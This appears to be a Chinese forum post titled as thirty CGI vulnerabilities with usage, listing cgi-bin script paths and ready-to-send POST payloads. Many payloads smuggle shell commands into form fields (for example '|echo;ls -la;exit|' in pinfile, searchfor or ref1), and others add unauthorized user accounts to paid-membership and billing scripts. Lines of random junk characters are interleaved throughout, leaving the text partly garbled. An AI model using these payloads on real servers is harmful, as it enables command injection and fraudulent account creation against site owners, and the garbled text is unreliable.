Cgi-bin 30个漏洞＋使用方法

admin

==============================
4 G' ~. [; [( b* {' Q+ v9 V
* ?" v7 w7 `  _1 Q' @& e" L. }/smspass.pl
username=username&password=password

/index.cgi
; \& ]9 O1 y9 v6 f8 gwei=ren&gen=command
1 X& B" K8 ~" I
/passmaster.cgi
6 O. l0 |$ j/ ~6 H  R: G' f- a- LAction=Add&Username=Username&Password=Password

/accountcreate.cgi
2 |% \- |' \1 C  c6 Z) d3 z% }username=username&password=password&ref1=|echo;ls|

/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
  K3 W6 D3 d5 ^9 l+ G
/addusr.pl
2 L+ |" B& Q4 y/ s  D/cgi-bin/EuroDebit/addusr.pl
; h* ~- c; C* Z7 U- N' q* K7 `user=username&pass=Password&confirm=Password

! k$ f: l) U* X0 f/ccbill-local.asp
9 ]: l6 n  G2 O; ~- bpost_values=username:password
: g; i( c+ B- S: F( ^% V
0 s9 [* `; \5 z' e/count.cgi
) M1 O) t' W* C3 n$ M9 \7 ?pinfile=|echo;ls -la;exit|

/recon.cgi
: V$ ^4 R0 {0 x/ @; T6 Y/recon.cgi?search
! y& l9 A( o' m# v) v/ w+ h6 z9 usearchoption=1&searchfor=|echo;ls -al;exit|

: K1 v4 @* |6 r# n. O/verotelrum.pl
' e" |1 R2 r: v) o( kvercode=username:password:dseegsow:add:amount<&30>

; y6 N! Y$ u7 R$ r/af.cgi
$ O5 c9 V" [$ \, y2 [_browser_out=|echo;ls -la;exit;|
( s; o7 n* T4 _( C3 w
& K! X1 M$ T% |6 s8 M% @& i. q/modify.cgi
, U" P% f7 V0 W* musername=username&password=password&expire=30

+ q# G7 R% G3 n) w3 J7 b/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|
7 E& o$ F- Y) p; N/ q, S' x. T
/ u; M. c: H0 J6 d5 \5 J( V/gx9passwd.cgi
cmd=ADD&user=username&pass=password

/probecontrol.cgi
command=enable&username=username&password=password

& y& C& R, P# s0 \$ ^6 D/ q( X/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit
& F4 S; m  U3 u. A) a
/htadd.pl
configfile=|echo; ls -alt; exit
  F" k1 W" f7 e3 a. U" I
* R; H# g/ J  U+ ?0 [/gx9passwd.cgi
cmd=ADD&user=username&pass=password

/ibill*.pl
4 q/ ]3 d& v' o: D# r9 j$ e4 l; [* lreqtype=add&authpwd=authpwd&username=username&password=password
* o- k8 e: Z+ g# ^$ Q; P+ p
/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)
  X! O; ]( h( ]0 @) [0 ^2 j, T9 W
; `& q9 b  ~; O( H" f) S/ C/globill_ut.cgi
! \  B7 \7 p" `5 q9 fdo=add&username=username&password=password&wpassword=password
4 S) q0 [, v" {
/usercontrol.cgi
command=enable&username=USER&password=PASS
. ^1 l/ {) y) B5 m7 c0 B$ p
/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password

$ }  x% U# T: u5 u' k3 v% U/addusr.pl
user=USER&pass=PASS&confirm=PASS

3 B9 Z; L: m2 F$ @/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
1 h; e' n6 B3 N- f& c5 H4 @( ~pinfile=|echo;pwd;exit|
6 z, j" C6 c) r5 v) \9 E
/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
# M" {7 {; }( m1 J! r! @7 nusername=username&password=password&password2=password&ref1=|echo;ls -al;exit

/af.cgi
/env.cgi
4 p1 a1 Z3 ]5 K+ c/ @! U/ _. jADD+;echo;pwd;exit

/count.cgi
7 J3 d1 q* r4 m; I/ g% Lpinfile=|echo;pwd;exit|
5 ~. u6 o- n* d9 l
/recon.cgi
6 n0 m' W( N) k' ?0 D! Dsearchoption=1&searchfor=|echo;ls%20-al;exit|
3 S" Q+ U& l$ [9 I
% o' w. S) f% {# O/add.cgi
username=username&password=password&expire=30
& l8 _- j* }. E
==============================